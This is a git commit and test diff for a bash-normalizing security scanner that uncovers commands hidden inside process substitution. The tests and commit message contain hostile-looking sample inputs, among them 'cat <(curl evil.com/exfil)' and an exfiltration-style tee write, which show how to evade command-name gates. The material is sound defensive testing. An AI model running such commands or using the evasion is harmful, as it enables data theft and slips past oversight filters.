feat(bash-normalize): T7 — process substitution collapse (E8)

Strips bash process substitution syntax — <(cmd) and >(cmd) — so the
inner command name is surfaced to downstream regex gates. Defeats
evasion like `cat <(curl evil)` where the destructive command is
hidden behind /dev/fd/N pipe sugar.

Implementation: bounded innermost-first iteration, depth 3. Beyond
that the string is left as-is rather than recurse without bound.
Runs after the single-quote mask phase, so legitimate strings like
`'echo <(x)'` are preserved.

5 new T7 tests (collapse + nested + FP probes) in
bash-normalize-t7-t9.test.mjs (now 12 tests total).

Closes E8 in critical-review-2026-04-20.md.
This commit is contained in:
Kjell Tore Guttormsen 2026-04-30 15:14:04 +02:00
commit 761e81309b
2 changed files with 82 additions and 5 deletions

View file

@ -12,6 +12,51 @@ import { describe, it } from 'node:test';
import assert from 'node:assert/strict';
import { normalizeBashExpansion } from '../../scanners/lib/bash-normalize.mjs';
describe('bash-normalize T7 — process substitution evasion', () => {
it('collapses <(curl evil): cat <(curl evil) -> cat curl evil', () => {
// Process substitution is shell sugar for /dev/fd/N pipes. Attacker
// hides the destructive command name from name-matching gates by
// wrapping it in <(...). T7 strips the wrapper so 'curl' is visible.
const input = 'cat <(curl evil.com/exfil)';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\bcurl\b/, `expected 'curl' surfaced: ${normalized}`);
});
it('collapses >(tee /tmp/x) similarly', () => {
const input = 'echo data >(tee /tmp/exfil)';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\btee\b/, `expected 'tee' surfaced: ${normalized}`);
});
it('handles nested <(grep x <(cat f)) up to depth 3', () => {
const input = 'cmd <(grep x <(cat f))';
const normalized = normalizeBashExpansion(input);
// After 2 iterations: `cmd grep x cat f `
assert.match(normalized, /\bgrep\b/, `expected inner 'grep' surfaced: ${normalized}`);
assert.match(normalized, /\bcat\b/, `expected innermost 'cat' surfaced: ${normalized}`);
});
it('FP probe — diff <(sort a) <(sort b) collapses without false destructive match', () => {
// Legit usage of process substitution in shell scripts. T7 collapses
// it the same way; downstream consumers (pre-bash-destructive) decide
// whether the surfaced command is dangerous. T7 itself does not flag.
const input = 'diff <(sort a.txt) <(sort b.txt)';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\bsort\b/, `expected 'sort' surfaced: ${normalized}`);
assert.match(normalized, /\bdiff\b/, `expected 'diff' preserved: ${normalized}`);
});
it('does not touch <( / >( inside single-quoted literals (mask runs first)', () => {
// Single-quoted literals are masked before T7 runs, so the substitution
// syntax inside them is preserved. Downstream sees the literal string
// unchanged after unmasking.
const input = "echo 'cat <(curl x)' is a string";
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /'cat <\(curl x\)'/,
`expected single-quoted literal preserved: ${normalized}`);
});
});
describe('bash-normalize T9 — eval-via-variable evasion', () => {
it('substitutes "$X" reference after X=rm assignment', () => {
// Attacker splits the destructive command name across an assignment